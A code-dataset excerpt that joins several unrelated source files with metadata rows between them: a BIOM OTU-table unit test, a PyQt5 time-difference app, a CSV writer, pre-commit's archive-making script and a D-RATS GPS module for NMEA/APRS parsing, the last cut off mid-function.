""" core_observations_across_sample_ids functions as expected
"""
actual = core_observations_across_sample_ids(self.otu_table_data1,
["S1", "s2"],
fraction_for_core=1.)
expected = ['o1', 'o5']
self.assertEqual(actual, expected)
# fraction_for_core = 0.5
actual = core_observations_across_sample_ids(self.otu_table_data1,
["S1", "s2"],
fraction_for_core=0.5)
expected = ['o1', 'o3', 'o5']
self.assertEqual(actual, expected)
def test_core_observations_across_sample_ids_invalid(self):
""" core_observations_across_sample_ids handles invalid input as expected
"""
self.assertRaises(ValueError,
core_observations_across_sample_ids,
self.otu_table_data1,
["S1", "s2"],
fraction_for_core=1.001)
self.assertRaises(ValueError,
core_observations_across_sample_ids,
self.otu_table_data1,
["S1", "s2"],
fraction_for_core=-0.001)
def test_core_observations_across_sample_ids_no_core(self):
"""core_observations_across_sample_ids handles filtering all obs
"""
actual = core_observations_across_sample_ids(self.otu_table_data2,
["S1", "s2", "s3", "s4"],
fraction_for_core=1.)
expected = []
self.assertEqual(actual, expected)
otu_table1 = """{"rows": [{"id": "o1", "metadata": {"OTUMetaData": "Eukarya;Human"}}, {"id": "o2", "metadata": {"OTUMetaData": "Eukarya;Moose"}}, {"id": "o3", "metadata": {"OTUMetaData": "Eukarya;Galapagos Tortoise"}}, {"id": "o4", "metadata": {"OTUMetaData": "Eukarya;Bigfoot"}}, {"id": "o5", "metadata": {"OTUMetaData": "Eukarya;Chicken"}}], "format": "Biological Observation Matrix 0.9.3", "data": [[0, 0, 105.0], [0, 1, 42.0], [0, 2, 99.0], [0, 3, 60000.0], [1, 2, 9.0], [1, 3, 99.0], [2, 0, 45.0], [4, 0, 1.0], [4, 1, 2.0], [4, 3, 3.0]], "columns": [{"id": "S1", "metadata": null}, {"id": "s2", "metadata": null}, {"id": "s3", "metadata": null}, {"id": "s4", "metadata": null}], "generated_by": "BIOM-Format 0.9.3", "matrix_type": "sparse", "shape": [5, 4], "format_url": "http://biom-format.org", "date": "2012-06-08T14:42:46.058411", "type": "OTU table", "id": null, "matrix_element_type": "float"}"""
otu_table2 = """{"rows": [{"id": "o1", "metadata": null}, {"id": "o2", "metadata": null}, {"id": "o3", "metadata": null}, {"id": "o4", "metadata": null}, {"id": "o5", "metadata": null}], "format": "Biological Observation Matrix 0.9.3", "data": [[0, 0, 105.0], [0, 1, 42.0], [0, 2, 99.0], [1, 2, 9.0], [1, 3, 99.0], [2, 0, 45.0], [4, 0, 1.0], [4, 1, 2.0], [4, 3, 3.0]], "columns": [{"id": "S1", "metadata": null}, {"id": "s2", "metadata": null}, {"id": "s3", "metadata": null}, {"id": "s4", "metadata": null}], "generated_by": "BIOM-Format 0.9.3", "matrix_type": "sparse", "shape": [5, 4], "format_url": "http://biom-format.org", "date": "2012-06-08T14:43:27.964500", "type": "OTU table", "id": null, "matrix_element_type": "float"}"""
if __name__ == "__main__":
main()
| gpl-2.0 | 8,308,714,476,410,311,000 | 55.986486 | 908 | 0.526678 | false | 3.06468 | true | false | false |
git-commit/TardisDiff | TardisDiff.py | 1 | 4981 | import sys
import os
import inspect
from PyQt5 import QtWidgets, QtCore, QtGui
import plugnplay
from uptime import boottime
from TardisUtil import TardisOptions, TimeSubmitter
class TardisDiff(QtWidgets.QMainWindow):
def __init__(self):
super(TardisDiff, self).__init__()
self.difference = 0
self.clipboard = QtWidgets.QApplication.clipboard()
# Set hot keys
QtWidgets.QShortcut(QtGui.QKeySequence("Ctrl+Shift+C"), self,
self.setClipboard)
QtWidgets.QShortcut(QtGui.QKeySequence("Ctrl+Shift+T"), self,
self.notify_time_submitters)
self.options = TardisOptions()
# Get plugins
plugnplay.plugin_dirs = ['./plugins', ]
plugnplay.load_plugins()
# Get directory path
# From: http://stackoverflow.com/a/22881871/1963958
if getattr(sys, 'frozen', False): # py2exe, PyInstaller, cx_Freeze
script_path = os.path.abspath(sys.executable)
else:
script_path = inspect.getabsfile(TardisDiff)
script_path = os.path.realpath(script_path)
script_path = os.path.dirname(script_path)
# Google for a fancy tardis icon until I've made one
self.setWindowIcon(QtGui.QIcon(
os.path.join(script_path, 'icon', 'tardis-by-camilla-isabell-kasbo.ico')))
self.initUI()
def initUI(self):
# Create and initialize UI elements
self.contentWidget = QtWidgets.QWidget()
self.gridLayout = QtWidgets.QGridLayout(self.contentWidget)
self.formLayout = QtWidgets.QFormLayout()
self.timeEdit1 = QtWidgets.QTimeEdit(self.contentWidget)
self.timeEdit2 = QtWidgets.QTimeEdit(self.contentWidget)
self.timeEditBreakTime = QtWidgets.QTimeEdit(self.contentWidget)
self.timeEditBreakTime.setDisplayFormat("h:mm")
self.timeEditBreakTime.setCurrentSection(
QtWidgets.QDateTimeEdit.MinuteSection)
self.timeEditBreakTime.setTime(QtCore.QTime(0, 30))
self.label_timeDiffOut = QtWidgets.QLabel(self.contentWidget)
self.button_time1_now = QtWidgets.QPushButton(
"Now", self.contentWidget)
self.button_time2_now = QtWidgets.QPushButton(
"Now", self.contentWidget)
self.label_timeDiffOut.setText("")
self.timeEdit1.setTime(self.getStartTime())
self.timeEdit2.setTime(QtCore.QTime.currentTime())
# Add UI elements
row1 = QtWidgets.QHBoxLayout()
row1.addWidget(self.timeEdit1)
row1.addWidget(self.button_time1_now)
row2 = QtWidgets.QHBoxLayout()
row2.addWidget(self.timeEdit2)
row2.addWidget(self.button_time2_now)
self.formLayout.addRow("Time 1:", row1)
self.formLayout.addRow("Time 2:", row2)
self.formLayout.addRow("Break Time:", self.timeEditBreakTime)
self.formLayout.addRow("Difference:", self.label_timeDiffOut)
self.gridLayout.addLayout(self.formLayout, 0, 0, 1, 1)
self.setCentralWidget(self.contentWidget)
self.statusBar()
# connect slots
self.timeEdit1.timeChanged.connect(self.inputChanged)
self.timeEdit2.timeChanged.connect(self.inputChanged)
self.timeEditBreakTime.timeChanged.connect(self.inputChanged)
self.button_time1_now.pressed.connect(self.reset_time1)
self.button_time2_now.pressed.connect(self.reset_time2)
self.setWindowTitle('TardisDiff')
self.inputChanged()
self.show()
def inputChanged(self):
"""
Checks both time inputs and the break time
input to determine the difference.
Then calls the method to update the ui.
"""
time1 = self.timeEdit1.time()
time2 = self.timeEdit2.time()
breakTime = self.timeEditBreakTime.time().secsTo(QtCore.QTime(0, 0))
self.difference = (time1.secsTo(time2) + breakTime) / 3600
self.difference = round(self.difference, 2)
self.label_timeDiffOut.setText(str(self.difference))
def reset_time1(self):
self.timeEdit1.setTime(QtCore.QTime.currentTime())
def reset_time2(self):
self.timeEdit2.setTime(QtCore.QTime.currentTime())
def setClipboard(self):
"""Sets the current diff text to clipboard"""
self.clipboard.setText(str(self.difference))
self.statusBar().showMessage("Copied to clipboard.")
def getStartTime(self):
return TardisDiff.getBootTimeAsQTime()\
if self.options.isStartTimeAuto()\
else QtCore.QTime.fromString(self.options.getStartTime())
def notify_time_submitters(self):
TimeSubmitter.submit_time(self.difference)
@staticmethod
def getBootTimeAsQTime():
return QtCore.QDateTime(boottime()).time()
def main():
app = QtWidgets.QApplication(sys.argv)
ed = TardisDiff()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| isc | 2,382,846,917,862,565,000 | 35.094203 | 86 | 0.656495 | false | 3.770628 | false | false | false |
PPKE-Bioinf/consensx.itk.ppke.hu | consensx/storage/csv.py | 1 | 1205 | class CSVBuffer(object):
"""Class which stores data for values.CSV"""
def __init__(self, my_path):
self.working_dir = my_path
self.max_resnum = -1
self.min_resnum = 100000
self.csv_data = []
def add_data(self, data):
self.csv_data.append(data)
def write_csv(self):
filename = self.working_dir + "values.csv"
output_csv = open(filename, 'w')
output_csv.write(',')
for data in self.csv_data:
output_csv.write(data["name"] + " EXP, " + data["name"] + " CALC,")
output_csv.write("\n")
for resnum in range(self.min_resnum, self.max_resnum + 1):
output_csv.write(str(resnum) + ',')
for data in self.csv_data:
exp = {}
for i in data["experimental"]:
exp[i.resnum] = i.value
try:
output_csv.write(
"{0:.2f}".format(exp[resnum]) + ',' +
"{0:.2f}".format(data["calced"][resnum]) + ','
)
except (IndexError, KeyError):
output_csv.write(',,')
output_csv.write("\n")
| mit | 8,709,585,037,877,639,000 | 31.567568 | 79 | 0.46971 | false | 3.753894 | false | false | false |
philipgian/pre-commit | pre_commit/make_archives.py | 1 | 2079 | from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import os.path
import tarfile
from pre_commit import five
from pre_commit import output
from pre_commit.util import cmd_output
from pre_commit.util import cwd
from pre_commit.util import rmtree
from pre_commit.util import tmpdir
# This is a script for generating the tarred resources for git repo
# dependencies. Currently it's just for "vendoring" ruby support packages.
REPOS = (
('rbenv', 'git://github.com/rbenv/rbenv', 'e60ad4a'),
('ruby-build', 'git://github.com/rbenv/ruby-build', '9bc9971'),
(
'ruby-download',
'git://github.com/garnieretienne/rvm-download',
'09bd7c6',
),
)
RESOURCES_DIR = os.path.abspath(
os.path.join(os.path.dirname(__file__), 'resources')
)
def make_archive(name, repo, ref, destdir):
"""Makes an archive of a repository in the given destdir.
:param text name: Name to give the archive. For instance foo. The file
that is created will be called foo.tar.gz.
:param text repo: Repository to clone.
:param text ref: Tag/SHA/branch to check out.
:param text destdir: Directory to place archives in.
"""
output_path = os.path.join(destdir, name + '.tar.gz')
with tmpdir() as tempdir:
# Clone the repository to the temporary directory
cmd_output('git', 'clone', repo, tempdir)
with cwd(tempdir):
cmd_output('git', 'checkout', ref)
# We don't want the '.git' directory
# It adds a bunch of size to the archive and we don't use it at
# runtime
rmtree(os.path.join(tempdir, '.git'))
with tarfile.open(five.n(output_path), 'w|gz') as tf:
tf.add(tempdir, name)
return output_path
def main():
for archive_name, repo, ref in REPOS:
output.write_line('Making {}.tar.gz for {}@{}'.format(
archive_name, repo, ref,
))
make_archive(archive_name, repo, ref, RESOURCES_DIR)
if __name__ == '__main__':
exit(main())
| mit | -5,814,434,410,959,443,000 | 27.875 | 76 | 0.644541 | false | 3.511824 | false | false | false |
coddingtonbear/d-rats | d_rats/gps.py | 1 | 33132 | import re
import time
import tempfile
import platform
import datetime
import subst
import threading
import serial
import socket
from math import pi,cos,acos,sin,atan2
import utils
if __name__ == "__main__":
import gettext
gettext.install("D-RATS")
TEST = "$GPGGA,180718.02,4531.3740,N,12255.4599,W,1,07,1.4,50.6,M,-21.4,M,,*63 KE7JSS ,440.350+ PL127.3"
EARTH_RADIUS = 3963.1
EARTH_UNITS = "mi"
DEGREE = u"\u00b0"
DPRS_TO_APRS = {}
# The DPRS to APRS mapping is pretty horrific, but the following
# attempts to create a mapping based on looking at the javascript
# for DPRSCalc and a list of regular APRS symbols
#
# http://ham-shack.com/aprs_pri_symbols.html
# http://www.aprs-is.net/DPRSCalc.aspx
for i in range(0, 26):
asciival = ord("A") + i
char = chr(asciival)
pri = "/"
sec = "\\"
DPRS_TO_APRS["P%s" % char] = pri + char
DPRS_TO_APRS["L%s" % char] = pri + char.lower()
DPRS_TO_APRS["A%s" % char] = sec + char
DPRS_TO_APRS["S%s" % char] = sec + char.lower()
if i <= 15:
pchar = chr(ord(" ") + i)
DPRS_TO_APRS["B%s" % char] = pri + pchar
DPRS_TO_APRS["O%s" % char] = sec + pchar
elif i >= 17:
pchar = chr(ord(" ") + i + 9)
DPRS_TO_APRS["M%s" % char] = pri + pchar
DPRS_TO_APRS["N%s" % char] = sec + pchar
if i <= 5:
char = chr(ord("S") + i)
pchar = chr(ord("[") + i)
DPRS_TO_APRS["H%s" % char] = pri + pchar
DPRS_TO_APRS["D%s" % char] = sec + pchar
#for k in sorted(DPRS_TO_APRS.keys()):
# print "%s => %s" % (k, DPRS_TO_APRS[k])
APRS_TO_DPRS = {}
for k,v in DPRS_TO_APRS.items():
APRS_TO_DPRS[v] = k
def dprs_to_aprs(symbol):
if len(symbol) < 2:
print "Invalid DPRS symbol: `%s'" % symbol
return None
else:
return DPRS_TO_APRS.get(symbol[0:2], None)
def parse_dms(string):
string = string.replace(u"\u00b0", " ")
string = string.replace('"', ' ')
string = string.replace("'", ' ')
string = string.replace(' ', ' ')
string = string.strip()
try:
(d, m, s) = string.split(' ', 3)
deg = int(d)
min = int(m)
sec = float(s)
except Exception, e:
deg = min = sec = 0
if deg < 0:
mul = -1
else:
mul = 1
deg = abs(deg)
return (deg + (min / 60.0) + (sec / 3600.0)) * mul
def set_units(units):
global EARTH_RADIUS
global EARTH_UNITS
if units == _("Imperial"):
EARTH_RADIUS = 3963.1
EARTH_UNITS = "mi"
elif units == _("Metric"):
EARTH_RADIUS = 6380.0
EARTH_UNITS = "km"
print "Set GPS units to %s" % units
def value_with_units(value):
if value < 0.5:
if EARTH_UNITS == "km":
scale = 1000
units = "m"
elif EARTH_UNITS == "mi":
scale = 5280
units = "ft"
else:
scale = 1
units = EARTH_UNITS
else:
scale = 1
units = EARTH_UNITS
return "%.2f %s" % (value * scale, units)
def NMEA_checksum(string):
checksum = 0
for i in string:
checksum ^= ord(i)
return "*%02x" % checksum
def GPSA_checksum(string):
def calc(buf):
icomcrc = 0xffff
for _char in buf:
char = ord(_char)
for i in range(0, 8):
xorflag = (((icomcrc ^ char) & 0x01) == 0x01)
icomcrc = (icomcrc >> 1) & 0x7fff
if xorflag:
icomcrc ^= 0x8408
char = (char >> 1) & 0x7f
return (~icomcrc) & 0xffff
return calc(string)
def DPRS_checksum(callsign, msg):
csum = 0
string = "%-8s,%s" % (callsign, msg)
for i in string:
csum ^= ord(i)
return "*%02X" % csum
def deg2rad(deg):
return deg * (pi / 180)
def rad2deg(rad):
return rad / (pi / 180)
def dm2deg(deg, min):
return deg + (min / 60.0)
def deg2dm(decdeg):
deg = int(decdeg)
min = (decdeg - deg) * 60.0
return deg, min
def nmea2deg(nmea, dir="N"):
deg = int(nmea) / 100
try:
min = nmea % (deg * 100)
except ZeroDivisionError, e:
min = int(nmea)
if dir == "S" or dir == "W":
m = -1
else:
m = 1
return dm2deg(deg, min) * m
def deg2nmea(deg):
deg, min = deg2dm(deg)
return (deg * 100) + min
def meters2feet(meters):
return meters * 3.2808399
def feet2meters(feet):
return feet * 0.3048
def distance(lat_a, lon_a, lat_b, lon_b):
lat_a = deg2rad(lat_a)
lon_a = deg2rad(lon_a)
lat_b = deg2rad(lat_b)
lon_b = deg2rad(lon_b)
earth_radius = EARTH_RADIUS
#print "cos(La)=%f cos(la)=%f" % (cos(lat_a), cos(lon_a))
#print "cos(Lb)=%f cos(lb)=%f" % (cos(lat_b), cos(lon_b))
#print "sin(la)=%f" % sin(lon_a)
#print "sin(lb)=%f" % sin(lon_b)
#print "sin(La)=%f sin(Lb)=%f" % (sin(lat_a), sin(lat_b))
#print "cos(lat_a) * cos(lon_a) * cos(lat_b) * cos(lon_b) = %f" % (\
# cos(lat_a) * cos(lon_a) * cos(lat_b) * cos(lon_b))
#print "cos(lat_a) * sin(lon_a) * cos(lat_b) * sin(lon_b) = %f" % (\
# cos(lat_a) * sin(lon_a) * cos(lat_b) * sin(lon_b))
#print "sin(lat_a) * sin(lat_b) = %f" % (sin(lat_a) * sin(lat_b))
tmp = (cos(lat_a) * cos(lon_a) * \
cos(lat_b) * cos(lon_b)) + \
(cos(lat_a) * sin(lon_a) * \
cos(lat_b) * sin(lon_b)) + \
(sin(lat_a) * sin(lat_b))
# Correct round-off error (which is just *silly*)
if tmp > 1:
tmp = 1
elif tmp < -1:
tmp = -1
distance = acos(tmp)
return distance * earth_radius
def parse_date(string, fmt):
try:
return datetime.datetime.strptime(string, fmt)
except AttributeError, e:
print "Enabling strptime() workaround for Python <= 2.4.x"
vals = {}
for c in "mdyHMS":
i = fmt.index(c)
vals[c] = int(string[i-1:i+1])
if len(vals.keys()) != (len(fmt) / 2):
raise Exception("Not all date bits converted")
return datetime.datetime(vals["y"] + 2000,
vals["m"],
vals["d"],
vals["H"],
vals["M"],
vals["S"])
class GPSPosition(object):
"""Represents a position on the globe, either from GPS data or a static
positition"""
def _from_coords(self, lat, lon, alt=0):
try:
self.latitude = float(lat)
except ValueError:
self.latitude = parse_dms(lat)
try:
self.longitude = float(lon)
except ValueError:
self.longitude = parse_dms(lon)
self.altitude = float(alt)
self.satellites = 3
self.valid = True
def _parse_dprs_comment(self):
symbol = self.comment[0:4].strip()
astidx = self.comment.rindex("*")
checksum = self.comment[astidx:]
_checksum = DPRS_checksum(self.station, self.comment[:astidx])
if int(_checksum[1:], 16) != int(checksum[1:], 16):
print "CHECKSUM(%s): %s != %s" % (self.station,
int(_checksum[1:], 16),
int(checksum[1:], 16))
#print "Failed to parse DPRS comment:"
#print " Comment: |%s|" % self.comment
#print " Check: %s %s (%i)" % (checksum, _checksum, astidx)
raise Exception("DPRS checksum failed")
self.APRSIcon = dprs_to_aprs(symbol)
self.comment = self.comment[4:astidx].strip()
def __init__(self, lat=0, lon=0, station="UNKNOWN"):
self.valid = False
self.altitude = 0
self.satellites = 0
self.station = station
self.comment = ""
self.current = None
self.date = datetime.datetime.now()
self.speed = None
self.direction = None
self.APRSIcon = None
self._original_comment = ""
self._from_coords(lat, lon)
def __iadd__(self, update):
self.station = update.station
if not update.valid:
return self
if update.satellites:
self.satellites = update.satellites
if update.altitude:
self.altitude = update.altitude
self.latitude = update.latitude
self.longitude = update.longitude
self.date = update.date
if update.speed:
self.speed = update.speed
if update.direction:
self.direction = update.direction
if update.comment:
self.comment = update.comment
self._original_comment = update._original_comment
if update.APRSIcon:
self.APRSIcon = update.APRSIcon
return self
def __str__(self):
if self.valid:
if self.current:
dist = self.distance_from(self.current)
bear = self.current.bearing_to(self)
distance = " - %.1f %s " % (dist, EARTH_UNITS) + \
_("away") + \
" @ %.1f " % bear + \
_("degrees")
else:
distance = ""
if self.comment:
comment = " (%s)" % self.comment
else:
comment = ""
if self.speed and self.direction:
if EARTH_UNITS == "mi":
speed = "%.1f mph" % (float(self.speed) * 1.15077945)
elif EARTH_UNITS == "m":
speed = "%.1f km/h" % (float(self.speed) * 1.852)
else:
speed = "%.2f knots" % float(self.speed)
dir = " (" + _("Heading") +" %.0f at %s)" % (self.direction,
speed)
else:
dir = ""
if EARTH_UNITS == "mi":
alt = "%i ft" % meters2feet(self.altitude)
else:
alt = "%i m" % self.altitude
return "%s " % self.station + \
_("reporting") + \
" %.4f,%.4f@%s at %s%s%s%s" % ( \
self.latitude,
self.longitude,
alt,
self.date.strftime("%H:%M:%S"),
subst.subst_string(comment),
distance,
dir)
else:
return "(" + _("Invalid GPS data") + ")"
def _NMEA_format(self, val, latitude):
if latitude:
if val > 0:
d = "N"
else:
d = "S"
else:
if val > 0:
d = "E"
else:
d = "W"
return "%.3f,%s" % (deg2nmea(abs(val)), d)
def station_format(self):
if " " in self.station:
call, extra = self.station.split(" ", 1)
sta = "%-7.7s%1.1s" % (call.strip(),
extra.strip())
else:
sta = self.station
return sta
def to_NMEA_GGA(self, ssid=" "):
"""Returns an NMEA-compliant GPGGA sentence"""
date = time.strftime("%H%M%S")
lat = self._NMEA_format(self.latitude, True)
lon = self._NMEA_format(self.longitude, False)
data = "GPGGA,%s,%s,%s,1,%i,0,%i,M,0,M,," % ( \
date,
lat,
lon,
self.satellites,
self.altitude)
sta = self.station_format()
# If we had an original comment (with some encoding), use that instead
if self._original_comment:
com = self._original_comment
else:
com = self.comment
return "$%s%s\r\n%-8.8s,%-20.20s\r\n" % (data,
NMEA_checksum(data),
sta,
com)
def to_NMEA_RMC(self):
"""Returns an NMEA-compliant GPRMC sentence"""
tstamp = time.strftime("%H%M%S")
dstamp = time.strftime("%d%m%y")
lat = self._NMEA_format(self.latitude, True)
lon = self._NMEA_format(self.longitude, False)
if self.speed:
speed = "%03.1f" % self.speed
else:
speed = "000.0"
if self.direction:
dir = "%03.1f" % self.direction
else:
dir = "000.0"
data = "GPRMC,%s,A,%s,%s,%s,%s,%s,000.0,W" % ( \
tstamp,
lat,
lon,
speed,
dir,
dstamp)
sta = self.station_format()
return "$%s%s\r\n%-8.8s,%-20.20s\r\n" % (data,
NMEA_checksum(data),
sta,
self.comment)
def to_APRS(self, dest="APRATS", symtab="/", symbol=">"):
"""Returns a GPS-A (APRS-compliant) string"""
stamp = time.strftime("%H%M%S", time.gmtime())
if " " in self.station:
sta = self.station.replace(" ", "-")
else:
sta = self.station
s = "%s>%s,DSTAR*:/%sh" % (sta, dest, stamp)
if self.latitude > 0:
ns = "N"
Lm = 1
else:
ns = "S"
Lm = -1
if self.longitude > 0:
ew = "E"
lm = 1
else:
ew = "W"
lm = -1
s += "%07.2f%s%s%08.2f%s%s" % (deg2nmea(self.latitude * Lm), ns,
symtab,
deg2nmea(self.longitude * lm), ew,
symbol)
if self.speed and self.direction:
s += "%03.0f/%03.0f" % (float(self.direction), float(self.speed))
if self.altitude:
s += "/A=%06i" % meters2feet(float(self.altitude))
else:
s += "/"
if self.comment:
l = 43
if self.altitude:
l -= len("/A=xxxxxx")
s += "%s" % self.comment[:l]
s += "\r"
return "$$CRC%04X,%s\n" % (GPSA_checksum(s), s)
def set_station(self, station, comment="D-RATS"):
self.station = station
self.comment = comment
self._original_comment = comment
if len(self.comment) >=7 and "*" in self.comment[-3:-1]:
self._parse_dprs_comment()
def distance_from(self, pos):
return distance(self.latitude, self.longitude,
pos.latitude, pos.longitude)
def bearing_to(self, pos):
lat_me = deg2rad(self.latitude)
lon_me = deg2rad(self.longitude)
lat_u = deg2rad(pos.latitude)
lon_u = deg2rad(pos.longitude)
lat_d = deg2rad(pos.latitude - self.latitude)
lon_d = deg2rad(pos.longitude - self.longitude)
y = sin(lon_d) * cos(lat_u)
x = cos(lat_me) * sin(lat_u) - \
sin(lat_me) * cos(lat_u) * cos(lon_d)
bearing = rad2deg(atan2(y, x))
return (bearing + 360) % 360
def set_relative_to_current(self, current):
self.current = current
def coordinates(self):
return "%.4f,%.4f" % (self.latitude, self.longitude)
def fuzzy_to(self, pos):
dir = self.bearing_to(pos)
dirs = ["N", "NNE", "NE", "ENE", "E",
"ESE", "SE", "SSE", "S",
"SSW", "SW", "WSW", "W",
"WNW", "NW", "NNW"]
delta = 22.5
angle = 0
direction = "?"
for i in dirs:
if dir > angle and dir < (angle + delta):
direction = i
angle += delta
return "%.1f %s %s" % (self.distance_from(pos),
EARTH_UNITS,
direction)
class NMEAGPSPosition(GPSPosition):
"""A GPSPosition initialized from a NMEA sentence"""
def _test_checksum(self, string, csum):
try:
idx = string.index("*")
except:
print "String does not contain '*XY' checksum"
return False
segment = string[1:idx]
csum = csum.upper()
_csum = NMEA_checksum(segment).upper()
if csum != _csum:
print "Failed checksum: %s != %s" % (csum, _csum)
return csum == _csum
def _parse_GPGGA(self, string):
elements = string.split(",", 14)
if len(elements) < 15:
raise Exception("Unable to split GPGGA" % len(elements))
t = time.strftime("%m%d%y") + elements[1]
if "." in t:
t = t.split(".")[0]
self.date = parse_date(t, "%m%d%y%H%M%S")
self.latitude = nmea2deg(float(elements[2]), elements[3])
self.longitude = nmea2deg(float(elements[4]), elements[5])
print "%f,%f" % (self.latitude, self.longitude)
self.satellites = int(elements[7])
self.altitude = float(elements[9])
m = re.match("^([0-9]*)(\*[A-z0-9]{2})\r?\n?(.*)$", elements[14])
if not m:
raise Exception("No checksum (%s)" % elements[14])
csum = m.group(2)
if "," in m.group(3):
sta, com = m.group(3).split(",", 1)
if not sta.strip().startswith("$"):
self.station = utils.filter_to_ascii(sta.strip()[0:8])
self.comment = utils.filter_to_ascii(com.strip()[0:20])
self._original_comment = self.comment
if len(self.comment) >=7 and "*" in self.comment[-3:-1]:
self._parse_dprs_comment()
self.valid = self._test_checksum(string, csum)
def _parse_GPRMC(self, string):
if "\r\n" in string:
nmea, station = string.split("\r\n", 1)
else:
nmea = string
station = ""
elements = nmea.split(",", 12)
if len(elements) < 12:
raise Exception("Unable to split GPRMC (%i)" % len(elements))
t = elements[1]
d = elements[9]
if "." in t:
t = t.split(".", 2)[0]
self.date = parse_date(d+t, "%d%m%y%H%M%S")
self.latitude = nmea2deg(float(elements[3]), elements[4])
self.longitude = nmea2deg(float(elements[5]), elements[6])
self.speed = float(elements[7])
self.direction = float(elements[8])
if "*" in elements[11]:
end = 11 # NMEA <=2.0
elif "*" in elements[12]:
end = 12 # NMEA 2.3
else:
raise Exception("GPRMC has no checksum in 12 or 13")
m = re.match("^.?(\*[A-z0-9]{2})", elements[end])
if not m:
print "Invalid end: %s" % elements[end]
return
csum = m.group(1)
if "," in station:
sta, com = station.split(",", 1)
self.station = utils.filter_to_ascii(sta.strip())
self.comment = utils.filter_to_ascii(com.strip())
self._original_comment = self.comment
if len(self.comment) >= 7 and "*" in self.comment[-3:-1]:
self._parse_dprs_comment()
if elements[2] != "A":
self.valid = False
print "GPRMC marked invalid by GPS (%s)" % elements[2]
else:
print "GPRMC is valid"
self.valid = self._test_checksum(string, csum)
def _from_NMEA_GPGGA(self, string):
string = string.replace('\r', ' ')
string = string.replace('\n', ' ')
try:
self._parse_GPGGA(string)
except Exception, e:
import traceback
import sys
traceback.print_exc(file=sys.stdout)
print "Invalid GPS data: %s" % e
self.valid = False
def _from_NMEA_GPRMC(self, string):
try:
self._parse_GPRMC(string)
except Exception, e:
import traceback
import sys
traceback.print_exc(file=sys.stdout)
print "Invalid GPS data: %s" % e
self.valid = False
def __init__(self, sentence, station=_("UNKNOWN")):
GPSPosition.__init__(self)
if sentence.startswith("$GPGGA"):
self._from_NMEA_GPGGA(sentence)
elif sentence.startswith("$GPRMC"):
self._from_NMEA_GPRMC(sentence)
else:
print "Unsupported GPS sentence type: %s" % sentence
class APRSGPSPosition(GPSPosition):
def _parse_date(self, string):
prefix = string[0]
suffix = string[-1]
digits = string[1:-1]
if suffix == "z":
ds = digits[0:2] + \
time.strftime("%m%y", time.gmtime()) + \
digits[2:] + "00"
elif suffix == "/":
ds = digits[0:2] + time.strftime("%m%y") + digits[2:] + "00"
elif suffix == "h":
ds = time.strftime("%d%m%y", time.gmtime()) + digits
else:
print "Unknown APRS date suffix: `%s'" % suffix
return datetime.datetime.now()
d = parse_date(ds, "%d%m%y%H%M%S")
if suffix in "zh":
delta = datetime.datetime.utcnow() - datetime.datetime.now()
else:
delta = datetime.timedelta(0)
return d - delta
def _parse_GPSA(self, string):
m = re.match("^\$\$CRC([A-Z0-9]{4}),(.*)$", string)
if not m:
return
crc = m.group(1)
_crc = "%04X" % GPSA_checksum(m.group(2))
if crc != _crc:
print "APRS CRC mismatch: %s != %s (%s)" % (crc, _crc, m.group(2))
return
elements = string.split(",")
if not elements[0].startswith("$$CRC"):
print "Missing $$CRC..."
return
self.station, dst = elements[1].split(">")
path, data = elements[2].split(":")
# 1 = Entire stamp or ! or =
# 2 = stamp prefix
# 3 = stamp suffix
# 4 = latitude
# 5 = N/S
# 6 = symbol table
# 7 = longitude
# 8 = E/W
# 9 = symbol
#10 = comment
#11 = altitude string
expr = "^(([@/])[0-9]{6}([/hz])|!|=)" + \
"([0-9]{1,4}\.[0-9]{2})([NS])(.)?" + \
"([0-9]{5}\.[0-9]{2})([EW])(.)" + \
"([^/]*)(/A=[0-9]{6})?"
m = re.search(expr, data)
if not m:
print "Did not match GPS-A: `%s'" % data
return
if m.group(1) in "!=":
self.date = datetime.datetime.now()
elif m.group(2) in "@/":
self.date = self._parse_date(m.group(1))
else:
print "Unknown timestamp prefix: %s" % m.group(1)
self.date = datetime.datetime.now()
self.latitude = nmea2deg(float(m.group(4)), m.group(5))
self.longitude = nmea2deg(float(m.group(7)), m.group(8))
self.comment = m.group(10).strip()
self._original_comment = self.comment
self.APRSIcon = m.group(6) + m.group(9)
if len(m.groups()) == 11 and m.group(11):
_, alt = m.group(11).split("=")
self.altitude = feet2meters(int(alt))
self.valid = True
def _from_APRS(self, string):
self.valid = False
try:
self._parse_GPSA(string)
except Exception, e:
print "Invalid APRS: %s" % e
return False
return self.valid
def __init__(self, message):
GPSPosition.__init__(self)
self._from_APRS(message)
class MapImage(object):
def __init__(self, center):
self.key = "ABQIAAAAWot3KuWpenfCAGfQ65FdzRTaP0xjRaMPpcw6bBbU2QUEXQBgHBR5Rr2HTGXYVWkcBFNkPvxtqV4VLg"
self.center = center
self.markers = [center]
def add_markers(self, markers):
self.markers += markers
def get_image_url(self):
el = [ "key=%s" % self.key,
"center=%s" % self.center.coordinates(),
"size=400x400"]
mstr = "markers="
index = ord("a")
for m in self.markers:
mstr += "%s,blue%s|" % (m.coordinates(), chr(index))
index += 1
el.append(mstr)
return "http://maps.google.com/staticmap?%s" % ("&".join(el))
def station_table(self):
table = ""
index = ord('A')
for m in self.markers:
table += "<tr><td>%s</td><td>%s</td><td>%s</td>\n" % (\
chr(index),
m.station,
m.coordinates())
index += 1
return table
def make_html(self):
return """
<html>
<head>
<title>Known stations</title>
</head>
<body>
<h1> Known Stations </h1>
<img src="%s"/><br/><br/>
<table border="1">
%s
</table>
</body>
</html>
""" % (self.get_image_url(), self.station_table())
def display_in_browser(self):
f = tempfile.NamedTemporaryFile(suffix=".html")
name = f.name
f.close()
f = file(name, "w")
f.write(self.make_html())
f.flush()
f.close()
p = platform.get_platform()
p.open_html_file(f.name)
class GPSSource(object):
def __init__(self, port, rate=4800):
self.port = port
self.enabled = False
self.broken = None
try:
self.serial = serial.Serial(port=port, baudrate=rate, timeout=1)
except Exception, e:
print "Unable to open port `%s': %s" % (port, e)
self.broken = _("Unable to open GPS port")
self.thread = None
self.last_valid = False
self.position = GPSPosition()
def start(self):
if self.broken:
print "Not starting broken GPSSource"
return
self.invalid = 100
self.enabled = True
self.thread = threading.Thread(target=self.gpsthread)
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
if self.thread and self.enabled:
self.enabled = False
self.thread.join()
self.serial.close()
def gpsthread(self):
while self.enabled:
data = self.serial.read(1024)
lines = data.split("\r\n")
for line in lines:
if line.startswith("$GPGGA") or \
line.startswith("$GPRMC"):
position = NMEAGPSPosition(line)
